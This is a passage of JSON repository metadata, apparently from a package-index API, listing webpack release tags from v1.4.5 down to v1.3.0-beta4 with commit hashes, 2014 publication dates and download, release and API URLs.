,"download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.5/manifests"},{"name":"v1.4.4","sha":"2bcb6f9bca77d5d4a42efface7c1e274412b5b64","kind":"commit","published_at":"2014-09-26T06:54:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.4/manifests"},{"name":"v1.4.3","sha":"91c7426e4595f0d3c45efc9c1e17b40d875e6de2","kind":"commit","published_at":"2014-09-23T06:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.3/manifests"},{"name":"v1.4.2","sha":"c117ec46eaa149d3732157744467e58b2baf4517","kind":"commit","published_at":"2014-09-22T21:51:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.2/manifests"},{"name":"v1.4.1-beta1","sha":"c59727720e4bf1feb5a1939b69154ceec0111ed0","kind":"commit","published_at":"2014-09-19T06:13:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-